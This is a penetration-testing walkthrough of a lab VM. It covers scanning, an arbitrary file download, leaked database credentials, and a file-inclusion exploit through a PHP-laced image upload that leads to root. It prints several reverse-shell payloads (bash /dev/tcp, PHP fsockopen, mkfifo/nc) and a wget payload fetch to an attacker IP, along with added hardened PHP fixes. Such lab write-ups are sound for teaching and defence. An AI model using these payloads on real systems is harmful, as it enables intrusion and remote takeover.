Pentesting the "india" target VM
1. Penetration process
Scan the LAN:
arp-scan --interface=eth0 192.168.0.1/24
Found the IP address:
192.168.0.104
Find the ports open on that IP:
nmap -v -A -oN /tmp/india.txt 192.168.0.104
Scan result:
Nmap 7.70 scan initiated Sun Apr 19 14:38:31 2020 as: nmap -v -A -oN /tmp/122.txt 192.168.0.104
Nmap scan report for 192.168.0.104
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
| 2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_ 256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: --==[[IndiShell Lab]]==--
MAC Address: 00:0C:29:A1:E2:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.002 days (since Sun Apr 19 14:35:37 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms 192.168.0.104
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Apr 19 14:38:40 2020 -- 1 IP address (1 host up) scanned in 9.01 seconds
Only two ports are open:
22 and 80
Look at the web service:
There is only a login form.
Try SQL injection first, using sqlmap:
sqlmap -u 192.168.0.104 --data="un=123&ps=123&login=let%27s+login" --level=3
Result:
all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF)
So no SQL injection here.
Start brute-forcing directories:
Requesting a path that does not exist shows the server is Apache/2.2.22 (Ubuntu), so the code is very likely PHP; brute-force PHP paths.
Tool used: Buster
Buster.exe -u=http://192.168.0.104/ -d=php.txt -t=5
Scan results (entries with status 400 removed):
200 OK-----http://192.168.0.104///add.php
200 OK-----http://192.168.0.104///index.php
200 OK-----http://192.168.0.104///head.php
200 OK-----http://192.168.0.104///show.php
200 OK-----http://192.168.0.104///test.php
200 OK-----http://192.168.0.104///c
200 OK-----http://192.168.0.104///index
200 OK-----http://192.168.0.104///panel
200 OK-----http://192.168.0.104///c.php
200 OK-----http://192.168.0.104///in.php
200 OK-----http://192.168.0.104///panel.php
403 Forbidden-----http://192.168.0.104///doc/
403 Forbidden-----http://192.168.0.104///cgi-bin/
403 Forbidden-----http://192.168.0.104///doc/demo/demo3.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo5.php
403 Forbidden-----http://192.168.0.104///doc/demo/database_demo.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo4.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo7.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo8.php
403 Forbidden-----http://192.168.0.104///doc/demo/hello_world_demo.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo6.php
403 Forbidden-----http://192.168.0.104///doc/fix_depricated.php
403 Forbidden-----http://192.168.0.104///doc/reports/index.php
403 Forbidden-----http://192.168.0.104///doc/demo/demo9.php
403 Forbidden-----http://192.168.0.104///doc/rpm-build/header.inc.php
403 Forbidden-----http://192.168.0.104///doc/rpm-build/checkout-build-archives.php
403 Forbidden-----http://192.168.0.104///doc/rpm-build/post_install.php
Check each page in turn. test.php shows this message:
'file' parameter is empty. Please provide file path in 'file' parameter
It says a file parameter is missing, so try an arbitrary file:
http://192.168.0.104///test.php?file=./test.php
Nothing happens with GET, so try the same request as POST:
It served its own source as a download! Files can be downloaded at will.
So download all the files found in the scan,
and the useful configuration files listed in phpinfo as well.
c.php turns out to be the database connection file:
mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
in.php is phpinfo.
With the database credentials found, look for a database admin interface; for a php+mysql site the usual tool is phpMyAdmin.
Could it have been renamed?
Search Baidu for common phpMyAdmin aliases, and try:
http://192.168.0.104/phpmy
The short name works and we are in.
The phpMyAdmin configuration file is
config.inc.php
or config.default.php
Download its configuration file and take a look. It contains:
$cfg['Servers'][$i]['user'] = 'root'; $cfg['Servers'][$i]['password'] = 'roottoor';
After logging in, the site redirects to
http://192.168.0.104/panel.php
Look at the downloaded panel.php.
panel.php is a user management page.
Reading the code reveals a file inclusion vulnerability:
if(isset($_POST['continue']))
{
    $dir=getcwd();
    $choice=str_replace('./','',$_POST['load']);
    if($choice==='add'){
        include($dir.'/'.$choice.'.php');
        die();
    }
    if($choice==='show'){
        include($dir.'/'.$choice.'.php');
        die();
    }
    else{
        include($dir.'/'.$_POST['load']);
    }
}
When
$choice!='add' && $choice!='show'
the file named by the load parameter is included. First add a user; users can upload an avatar. Reading the code shows only images are accepted, so we use an image with PHP embedded in it:
$ip=@$_POST['ip'];
$port=@$_POST['port'];
@system("bash -i >& /dev/tcp/{$ip}/{$port} 0>&1");
This is a reverse shell that takes ip and port as POST parameters.
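The include in panel.php and the file parameter in test.php share one root cause: the request is allowed to choose a filesystem path. Below is an added example of the hardened form (not code from the target VM); the function names and the downloads directory are assumptions.

```php
<?php
// Added example, not code from the target VM: hardened replacements for the
// include in panel.php and the file download in test.php. Function names and
// the download directory are assumptions.

// panel.php: map the two legitimate 'load' values to fixed files and refuse
// the rest, so an attacker-controlled path never reaches include().
function resolve_panel_page(string $load): ?string
{
    $pages = ['add' => __DIR__ . '/add.php', 'show' => __DIR__ . '/show.php'];
    return $pages[$load] ?? null;
}

// test.php: resolve the requested name inside one download directory and
// check the canonical path is still under it, which stops '../' and symlinks.
function resolve_download(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;
    }
    $target = realpath($base . '/' . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare with the trailing separator so /srv/files-secret is not
    // accepted as lying inside /srv/files.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

if (isset($_POST['continue'])) {
    $page = resolve_panel_page((string) ($_POST['load'] ?? ''));
    if ($page === null) {
        http_response_code(400);
        exit('unknown page');
    }
    include $page;
    exit;
}

if (isset($_POST['file'])) {
    $path = resolve_download(__DIR__ . '/downloads', (string) $_POST['file']);
    if ($path === null) {
        http_response_code(404);
        exit('no such file');
    }
    header('Content-Type: application/octet-stream');
    readfile($path);
}
```

With this in place, load=uploaded_images/shell.png is rejected before include() is ever reached, and file=../c.php resolves outside the downloads directory and is refused.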
Exploit the vulnerability.
Locate the uploaded image:
http://192.168.0.104/uploaded_images/shell.png
Intercept the request and change the submitted parameters:
load=uploaded_images/shell.png&continue=continue&ip=192.168.0.108&port=1111
Listen with nc:
nc -lvp 1111
No connection came back.
Probably the parameters submitted in the same request are no longer available once the file is included.
Switch to an image payload with a hard-coded IP and port:
@system("bash -i >& /dev/tcp/192.168.0.108/6666 0>&1");
Listen with nc:
nc -lvp 6666
Then used the following instead:
set_time_limit(0);
$ip='192.168.0.108';
$port='2520';
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){ echo "error";}
else{
    fputs($fp,"\nconnect success\n");
    while (!feof($fp)) {
        fputs($fp,"shell:");
        $shell=fgets($fp);
        $message=`$shell`;
        fputs($fp,$message);
    }
    fclose($fp);
}
This gave a shell as
www-data
with almost no privileges; it can only work within the web root,
and only the uploaded_images directory is writable.
Wrote a one-line webshell, uploaded it, and connected with China Chopper (菜刀).
The OS version is
Ubuntu12.04
for which there is CVE-2015-1328,
but privilege escalation still failed:
the China Chopper terminal could not run the exp (the privilege-escalation program).
Finally, used the China Chopper terminal to spawn a reverse shell:
mkfifo /tmp/lcawx; nc 192.168.0.108 4444 0</tmp/lcawx | /bin/sh >/tmp/lcawx 2>&1; rm /tmp/lcawx
then ran the exp in that reverse shell
and got a root shell.
2. Important information
a. Database credentials
user:billu passwd:b0x_billu dbname:ica_lab
user:root passwd:roottoor (root password)
b. Web login credentials
user:biLLu passwd:hEx_it
wget http://192.168.0.108:1010/rt ./uploaded_images/r
bash -i >& /dev/tcp/192.168.0.108/1999 0>&1
mkfifo /tmp/lcawx; nc 192.168.0.108 4444 0</tmp/lcawx | /bin/sh >/tmp/lcawx 2>&1; rm /tmp/lcawx
3. Summary
<input type="file" name="file" id="file"><input type="submit" name="submit" value="up">
if($_FILES["file"])
move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
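For comparison with the upload handler quoted above, which stores the file under the client-supplied name with no content check, here is a hardened version as an added example (not code from the target VM); the upload directory, size limit and GD re-encoding are assumptions.

```php
<?php
// Added example, not code from the target VM: a safer version of the upload
// handler quoted above. The upload directory, size limit and the use of GD to
// re-encode the image are assumptions.
const UPLOAD_DIR = __DIR__ . '/uploaded_images';
const MAX_BYTES  = 2 * 1024 * 1024;
// Returns [storedName, null] on success or [null, reason] when refused.
function store_avatar(array $file): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return [null, 'upload failed'];
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        return [null, 'file too large'];
    }
    // Decide the type from the file's own bytes, never from the client-supplied
    // name or 'type' field. getimagesize() parses the real image header.
    $info = @getimagesize($file['tmp_name']);
    $types = [
        IMAGETYPE_PNG  => ['png', 'imagepng'],
        IMAGETYPE_JPEG => ['jpg', 'imagejpeg'],
        IMAGETYPE_GIF  => ['gif', 'imagegif'],
    ];
    if ($info === false || !isset($types[$info[2]])) {
        return [null, 'not an image'];
    }
    // A valid PNG with PHP appended after the image data still passes that
    // check, so re-encode through GD: pixels survive, appended bytes do not.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        return [null, 'image could not be decoded'];
    }
    // Server-chosen random name and extension: the original kept the client's
    // name, which let shell.png (or any other name) land verbatim.
    [$ext, $writer] = $types[$info[2]];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    // Even so, UPLOAD_DIR must never be reachable from include() and should be
    // served with PHP execution disabled; defence in depth, not either/or.
    return $writer($img, UPLOAD_DIR . '/' . $name) ? [$name, null] : [null, 'could not store file'];
}

if (isset($_FILES['file'])) {
    [$name, $err] = store_avatar($_FILES['file']);
    if ($name === null) {
        http_response_code(400);
        exit(htmlspecialchars($err));
    }
    echo 'stored as ' . htmlspecialchars($name);
}
```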